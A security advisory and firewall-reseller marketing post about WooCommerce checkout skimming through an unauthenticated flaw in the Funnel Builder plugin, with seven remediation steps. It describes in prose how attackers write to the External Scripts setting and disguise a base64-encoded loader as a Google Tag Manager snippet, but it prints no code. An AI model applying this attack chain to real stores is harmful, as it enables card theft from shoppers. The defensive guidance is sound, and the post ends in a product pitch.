WooCommerce checkout skimming has quietly become one of the most damaging threats facing online stores in 2026 — and a freshly exploited WordPress plugin flaw has just dropped more than 40,000 shops directly into the firing line. If you sell anything through WordPress, attackers could already be copying your customers’ credit card details on every single sale, and you would see no error, no warning, and no sign that anything is wrong.
This guide explains exactly how the attack works, how to check whether your store is exposed, and the seven steps you need to take today.
Table of Contents
What Is WooCommerce Checkout Skimming?
WooCommerce checkout skimming is a type of attack where criminals secretly inject malicious JavaScript into your store’s checkout page. As your customer fills in their name, card number, CVV, and billing address, that hidden code silently copies every keystroke and sends it to a server controlled by the attacker.
The dangerous part is how invisible it is. The customer’s order still goes through normally. Your dashboard looks fine. No plugin throws an error. Meanwhile, every card processed on your store is being harvested and later sold on dark-web carding markets. Security researchers call this style of digital card theft a Magecart attack, and it has been growing fast because it targets the one page where money and trust meet: the checkout.
For a store owner, the fallout is severe — fraudulent chargebacks, PCI compliance penalties, a damaged brand, and the very real risk of Google flagging your domain as “deceptive,” which wipes out organic traffic overnight.
The Funnel Builder Flaw Behind the Latest Attacks
The current wave of attacks is being driven by a critical security flaw in Funnel Builder by FunnelKit, a popular WordPress plugin installed on more than 40,000 WooCommerce stores. Shop owners use it to customise checkout pages, build landing pages, and add one-click upsells.
The vulnerability affects every version of the plugin released before 3.15.0.3. What makes it especially dangerous is that it is unauthenticated — an attacker needs no login, no password, and no account to exploit it. The plugin exposed a public checkout endpoint that failed to check user permissions properly. Attackers could send a crafted request that wrote their own data straight into the plugin’s global “External Scripts” setting — and whatever sits in that setting gets printed onto every checkout page on the store.
The flaw was discovered by Dutch e-commerce security firm Sansec, which confirmed it is being actively exploited in the wild. You can read their full technical breakdown in the Sansec FunnelKit vulnerability research and the reporting by BleepingComputer on the Funnel Builder skimmer campaign.
The Fake Google Tag Manager Disguise
Here is the clever trick that helps this attack stay hidden. Instead of injecting obvious malicious code, attackers dress their skimmer up as a harmless-looking Google Tag Manager or Google Analytics script. The fake snippet sits right next to a store’s genuine marketing tags, and most owners — and even some developers — skim straight past anything that looks like a familiar tracking tag.
That fake script uses base64 encoding to hide a second-stage URL. When the checkout page loads, it quietly decodes the address, pulls in an external script, and opens a WebSocket connection to the attacker’s command-and-control server. From there, a custom-built payment skimmer is delivered, perfectly tailored to that specific storefront. It is camouflage, and it works.
Is Your WooCommerce Store at Risk?
Run through this quick check:
- You run WordPress + WooCommerce. That is the target platform.
- You have the Funnel Builder plugin installed. Check Plugins in your WordPress dashboard.
- Your Funnel Builder version is below 3.15.0.3. Reporting suggests over half of active installs are still on vulnerable versions.
If all three are true, treat this as an active incident, not a future risk. And even if you do not use Funnel Builder, the lesson still applies — checkout skimming through vulnerable plugins is a pattern, not a one-off, so the steps below are worth doing regardless.
7 Steps to Stop WooCommerce Checkout Skimming Right Now
- Update Funnel Builder immediately. Go to your WordPress dashboard and update the plugin to version 3.15.0.3 or later. The official patch is available on the Funnel Builder plugin page on WordPress.org. This is the single most important step.
- Audit your External Scripts setting. Open Settings → Checkout → External Scripts (and any other script fields). Remove anything you do not personally recognise — especially “analytics” or “Tag Manager” snippets you never added yourself.
- Scan your entire store for skimmers and backdoors. Updating the plugin stops new injections, but it does not remove code that is already there. Use a malware scanner such as eComscan, Wordfence, or Sucuri to find hidden skimmers, backdoors, and modified files.
- Rotate every secret. Change all admin passwords, regenerate your WordPress security salts, and rotate API keys and payment gateway credentials. Assume anything an attacker could have touched is compromised.
- Inspect your live checkout page. View the page source on your real checkout page and watch for unexpected outbound connections to unfamiliar domains. A skimmer always has to “phone home” somewhere.
- Check for unauthorised changes. Review your list of admin users for accounts you did not create, and look at recently modified files for anything suspicious.
- Harden your network perimeter. A skimmer relies on talking to an external server. A properly configured firewall or web application firewall can block malicious traffic patterns and known command-and-control domains before customer data ever leaves your store.
Why Updating Plugins Alone Isn’t Enough
Here is the uncomfortable truth: there will always be another vulnerable plugin. Funnel Builder today, something else next month. WordPress stores run dozens of third-party plugins, and every one of them is a potential entry point. Patching is essential, but patching is reactive — it only helps after a flaw is public.
Real protection comes from defence in depth: layering security so that one failed plugin does not equal one breached store. A business-grade network firewall sits in front of your infrastructure, inspects traffic, and blocks the malicious connections a skimmer needs to function. Next-generation appliances from Fortinet’s FortiGate range and SonicWall’s TZ firewalls add intrusion prevention, SSL inspection, and outbound threat filtering — exactly the controls that catch a skimmer “calling home.”
If you want a complete picture of layered protection for a small business, our guide to the $500 small business network security setup walks through it step by step, and our breakdown of Zero Trust security for small business owners explains why “never trust, always verify” is the model that stops attacks like this from spreading.
Protect Your Store and Network with Jazz Cyber Shield
At Jazz Cyber Shield, we are a US-based, authorised reseller of enterprise security hardware — Fortinet, SonicWall, and WatchGuard firewalls included. If you are not sure which appliance fits your store and network, our team will help you choose the right one. Request a free quote or browse our full hardware range to start building a defence that does not depend on a single plugin staying safe.
Frequently Asked Questions
What is WooCommerce checkout skimming? It is an attack where malicious JavaScript is injected into a WooCommerce checkout page to silently steal customers’ credit card numbers, CVVs, and billing details as they are typed.
How do I know if my store has a skimmer? Run a dedicated malware scan, review your plugin script settings for unfamiliar code, and check your checkout page for connections to unknown external domains.
Does updating Funnel Builder remove an existing skimmer? No. Updating to version 3.15.0.3 stops new code from being injected, but any skimmer already installed must still be found and removed manually with a security scan.
Can a firewall stop WooCommerce checkout skimming? A firewall cannot patch a plugin flaw, but it can block the malicious outbound connections a skimmer needs to send stolen data, adding a critical extra layer of defence.
Is WooCommerce safe to use? Yes. WooCommerce itself is secure — the risk almost always comes from outdated or vulnerable third-party plugins, which is why timely updates and a hardened network perimeter matter so much.
Final Word
WooCommerce checkout skimming succeeds because it is silent. The single best thing you can do today is update Funnel Builder, scan your store, and stop treating plugin patches as your only line of defence. Layer your security, harden your network, and your store stays a place customers can trust.
